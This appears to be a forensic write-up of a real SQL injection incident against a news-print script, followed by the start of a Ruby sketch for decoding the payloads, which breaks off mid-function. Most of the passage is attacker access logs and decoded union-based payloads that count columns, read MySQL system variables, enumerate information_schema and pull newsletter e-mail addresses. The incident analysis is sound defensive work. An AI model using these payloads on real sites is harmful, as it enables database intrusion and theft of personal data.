A website had an SQL injection vulnerability in the script news-druck.php. An attacker discovered it and exploited it four or five days later. The exploitation, however, put so much load on the system that the incident was noticed.

Among other things, e-mail addresses were read out of the database through the vulnerability. The source code of the script was not publicly known (closed source).

Discovery of the vulnerability

58.40.69.134 - - [08/Feb/2011:21:16:05 +0100] "GET /news-druck.php?newsid=6428 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:06 +0100] "GET /news-druck.php?newsid=6428%27%60%28%5B%7B%5E%7E HTTP/1.1" 200 1872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:06 +0100] "GET /news-druck.php?newsid=6428%20aND%208%3D8 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:07 +0100] "GET /news-druck.php?newsid=6428%20aND%208%3D3 HTTP/1.1" 200 1702 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:29 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20len%28uSeR%29%3E0%20 HTTP/1.1" 200 1872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:29 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20aSc%28chr%2899%29%29%3D99%20 HTTP/1.1" 200 1872 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:30 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20length%28uSeR%28%29%29%3E0%20 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.40.69.134 - - [08/Feb/2011:21:16:31 +0100] "GET /news-druck.php?newsid=6428%20%20AnD%20version%28%29%3E%3D5%20%20 HTTP/1.1" 200 3544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Decoded parameters:

{"newsid"=>["6428"]}
{"newsid"=>["6428'`([{^~"]}
{"newsid"=>["6428 aND 8=8"]}
{"newsid"=>["6428 aND 8=3"]}
{"newsid"=>["6428  AnD len(uSeR)>0 "]}
{"newsid"=>["6428  AnD aSc(chr(99))=99 "]}
{"newsid"=>["6428  AnD length(uSeR())>0 "]}
{"newsid"=>["6428  AnD version()>=5  "]}

Exploiting the vulnerability

Decoded beginning of the first attack:

mysql> select 0x2128265E29284023;
+--------------------+
| 0x2128265E29284023 |
+--------------------+
| !(&^)(@#           |
+--------------------+

  Step 1: Determining the number of columns in the query

    newsid => 6428 and 3=8 union select 0x2128265E29284023 --
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    newsid => 6428 and 3=8 union select 0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023,0x2128265E29284023 -- 
    
  Step 2: Determining which columns are output on the web page

    newsid => 6428 and 3=8 union select 0x2128265E29284023,2,3,4,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,0x2128265E29284023,3,4,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,0x2128265E29284023,4,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,0x2128265E29284023,5,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,0x2128265E29284023,6,7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,0x2128265E29284023,7,8,9,10,11,12,13,14 -- 
    
  Step 3: Reading out system information

    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,version(),0x7E257E,database(),0x7E257E,user(),0x7E257E,session_user(),0x7E257E,current_user(),0x7E257E,system_user(),0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@basedir,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@datadir,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@tmpdir,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,@@version_compile_os,0x252423),7,8,9,10,11,12,13,14 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,'24287ed92d9c91f5',7,8,9,10,11,12,13,14 -- 
    newsid => 6428  /*!49999 and 1=2*/
    
  Step 4: Reading out the database structure

    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `schema_name`,`default_character_set_name` from `information_schema`.`schemata`) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`schema_name`,0x4E554C4C),char(9),ifnull(`default_character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`schemata` limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`schema_name`,0x4E554C4C),char(9),ifnull(`default_character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`schemata` limit 1,1 -- 
    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `table_name`,`table_rows` from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 8,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 9,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`table_name`,0x30),char(9),ifnull(`table_rows`,0x30),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`tables` where table_schema=0x7573725F7765623232325F31 limit 10,1 -- 
    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `column_name`,`data_type`,`character_set_name` from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 8,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 9,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 10,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 11,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 12,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 13,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 14,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 15,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 16,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 17,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 18,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 19,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 20,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x77696E6E6572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 21,1 -- 
    
    
    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `column_name`,`data_type`,`character_set_name` from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 8,1 -- 
    
  Step 5: Reading out table contents

    newsid => 6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `id`,`email` from `usr_web222_1`.`newsletter`) t -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 0,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 1,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 2,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 3,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 4,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 5,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 6,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 7,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 8,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 9,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 10,1 -- 
    newsid => 6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 11,1 -- 
    

Further tables were then read out following the same pattern: Chronologie-sql-injection-access.log.
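
For incident response, the decoded payloads show which tables were targeted and how many rows were requested. The following Ruby sketch is an added example, not part of the original write-up: it turns the MySQL hex literals back into readable strings (as the `select 0x2128265E29284023` query above does for the marker) and counts the distinct `limit N,1` offsets per target. The function names are mine, and the sample is a constructed selection of five payload lines from steps 4 and 5.

```ruby
# Constructed sample: decoded newsid values taken from steps 4 and 5 above.
SAMPLE_PAYLOADS = <<~'SQL'.lines.map(&:chomp)
  6428 and 1=2 union select 1,2,3,4,5,concat(0x232425,count(8),0x252423),7,8,9,10,11,12,13,14 from (select `id`,`email` from `usr_web222_1`.`newsletter`) t --
  6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`column_name`,0x4E554C4C),char(9),ifnull(`data_type`,0x4E554C4C),char(9),ifnull(`character_set_name`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `information_schema`.`COLUMNS` where TABLE_NAME=0x6E6577736C6574746572 and TABLE_SCHEMA=0x7573725F7765623232325F31 limit 0,1 --
  6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 0,1 --
  6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 1,1 --
  6428 and 3=8 union select 1,2,3,4,5,concat(0x232425,ifnull(`id`,0x4E554C4C),char(9),ifnull(`email`,0x4E554C4C),char(9),0x252423),7,8,9,10,11,12,13,14 from `usr_web222_1`.`newsletter` limit 2,1 --
SQL

# Replaces 0x... literals that decode to printable ASCII with a quoted string;
# anything else (odd length, binary content) is left untouched.
def decode_hex_literals(sql)
  sql.gsub(/\b0x(?:[0-9A-Fa-f]{2})+\b/) do |lit|
    text = [lit[2..-1]].pack('H*')
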